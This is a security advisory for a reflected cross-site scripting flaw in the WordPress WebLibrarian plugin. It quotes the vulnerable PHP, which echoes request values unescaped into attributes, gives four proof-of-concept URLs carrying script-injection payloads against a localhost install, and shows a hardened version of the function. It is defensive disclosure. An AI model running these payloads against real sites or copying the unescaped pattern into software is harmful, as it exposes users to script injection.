WordPress WebLibrarian Plugin <= 3.5.8.1 is vulnerable to Cross Site Scripting (XSS)

Patch priority: High (patch immediately)
CVSS 3.1 score: 7.1 (High severity)
Published on 14 August, 2023


Vulnerability description

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WebLibrarian Plugin to Patchstack.


How to reproduce

A reflected XSS (RXSS) vulnerability occurs from line 643 to line 653 in display_bulk_upload_form() of the weblibrarian/includes/WEBLIB_Patrons_Admin.php file: the values of several request parameters are echoed into hidden input attributes without any output escaping.

<?php
// Vulnerable code as shipped: each $_REQUEST value is echoed straight into an
// HTML attribute with no output escaping, so a value such as "><script>...</script>
// closes the value="..." attribute and injects markup (reflected XSS).
function display_bulk_upload_form($returnURL) {
    if ( isset($_REQUEST['paged']) ) {
        ?><input type="hidden" name="paged" value="<?php echo $_REQUEST['paged'] ?>" /><?php
    }
    if ( isset($_REQUEST['screen-options-apply']) ) {
        ?><input type="hidden" name="screen-options-apply" value="<?php echo $_REQUEST['screen-options-apply'] ?>" /><?php
    }
    if ( isset($_REQUEST['wp_screen_options']['option']) ) {
        ?><input type="hidden" name="wp_screen_options[option]" value="<?php echo $_REQUEST['wp_screen_options']['option'] ?>" /><?php
    }
    if ( isset($_REQUEST['wp_screen_options']['value']) ) {
        ?><input type="hidden" name="wp_screen_options[value]" value="<?php echo $_REQUEST['wp_screen_options']['value'] ?>" /><?php
    }
    // the remainder of the function (beyond line 653) is not shown in the advisory
}

Additional information by researcher

paged, screen-options-apply, wp_screen_options, option, wp_screen_options, value

Additional comment by Patchstack

Additional vulnerable endpoints:

[+] PoC 01 :

http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-collection&paged=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&screen-options-apply=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&wp_screen_options%5Boption%5D=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3Ewp_screen_options%5Bvalue%5D%3D%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E

[+] PoC 02 :

http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-collection-bulk&paged=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&screen-options-apply=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&wp_screen_options%5Boption%5D=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3Ewp_screen_options%5Bvalue%5D%3D%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E

[+] PoC 03 :

http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-collection&barcode=123&title=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&itemauthor=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&subject=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&description=1&itemcategory=%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&media=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&publisher=%22%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&publocation=%22%3E%3Cscript%3Ealert%287%29%3C%2Fscript%3E&pubdate=Jan%2F1%2F2023&edition=%22%3E%3Cscript%3Ealert%288%29%3C%2Fscript%3E&isbn=1&type=1&thumburl=1&callnumber=%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E&keywordlist&newkeyword&additem=Add+New+Item

[+] PoC 04 :

http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-type&typename="><script>alert(1)</script>&loanperiod=14&addtype=Add+New+Type
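A hardened version of the display_bulk_upload_form() function quoted above, added here as an example and not taken from the plugin or from Patchstack. It assumes WordPress's esc_attr() and absint() core functions and defines stand-ins only so the file runs from the command line; the sample request values and the function name display_bulk_upload_form_fixed are constructed for the demonstration.

```php
<?php
// Added example (not the plugin's code): hardened display_bulk_upload_form().
// esc_attr() and absint() are WordPress core functions; these fallbacks only let
// the file run outside WordPress and approximate core's behaviour.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('absint')) {
    function absint($maybeint) {
        return abs((int) $maybeint);
    }
}

// Every request value is escaped for the HTML-attribute context at the point of
// output. 'paged' is a page number, so it is coerced to a non-negative integer
// instead of being reflected verbatim; free-form values go through esc_attr().
function display_bulk_upload_form_fixed($returnURL) {
    if (isset($_REQUEST['paged'])) {
        ?><input type="hidden" name="paged" value="<?php echo absint($_REQUEST['paged']); ?>" /><?php
    }
    if (isset($_REQUEST['screen-options-apply'])) {
        ?><input type="hidden" name="screen-options-apply" value="<?php echo esc_attr($_REQUEST['screen-options-apply']); ?>" /><?php
    }
    if (isset($_REQUEST['wp_screen_options']['option'])) {
        ?><input type="hidden" name="wp_screen_options[option]" value="<?php echo esc_attr($_REQUEST['wp_screen_options']['option']); ?>" /><?php
    }
    if (isset($_REQUEST['wp_screen_options']['value'])) {
        ?><input type="hidden" name="wp_screen_options[value]" value="<?php echo esc_attr($_REQUEST['wp_screen_options']['value']); ?>" /><?php
    }
}

// Constructed input: the decoded form of the advisory's PoC 01 query string
// (the 'per_page' value is a made-up benign setting name).
$_REQUEST = [
    'paged'                => '"><script>alert(1)</script>',
    'screen-options-apply' => '"><script>alert(2)</script>',
    'wp_screen_options'    => ['option' => '"><script>alert(3)</script>', 'value' => 'per_page'],
];

ob_start();
display_bulk_upload_form_fixed('/wp-admin/admin.php');
$html = ob_get_clean();
echo $html, PHP_EOL;

// The payload now stays inside the attribute: '"' becomes &quot;, '<' and '>'
// become &lt; and &gt;, and the bogus page number collapses to 0.
if (strpos($html, '<script>') !== false || strpos($html, 'value="0"') === false) {
    throw new RuntimeException('escaping failed');
}
```

The same output escaping is needed on the item and type form fields reflected by the PoC 03 and PoC 04 endpoints, since the advisory lists those as additional injection points.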


How to disclose

To make the patching process easier and safer for all users, we recommend reading our memo about the most common vulnerabilities and the way these can be fixed. If you need help understanding some of the security concepts, don’t worry. That’s when we step in and help.

Please send us the patched version or code before releasing it, so we could help you avoid incomplete patches that could lead to inconveniences. Don’t delay security patch releases for other non-security updates. Ideally, security fixes would be released separately so users could update ASAP without fear of anything breaking. You can also join the free Patchstack mVDP program to have better control over the vulnerability patching and disclosure process.

Software: WebLibrarian
Type: Plugin
PSID: e45d424e6b8c
Vulnerable versions: <= 3.5.8.1
Classification: Cross Site Scripting (XSS)
OWASP Top 10: A7: Cross-Site Scripting (XSS)
Required privilege: Unauthenticated
Published: 14 August, 2023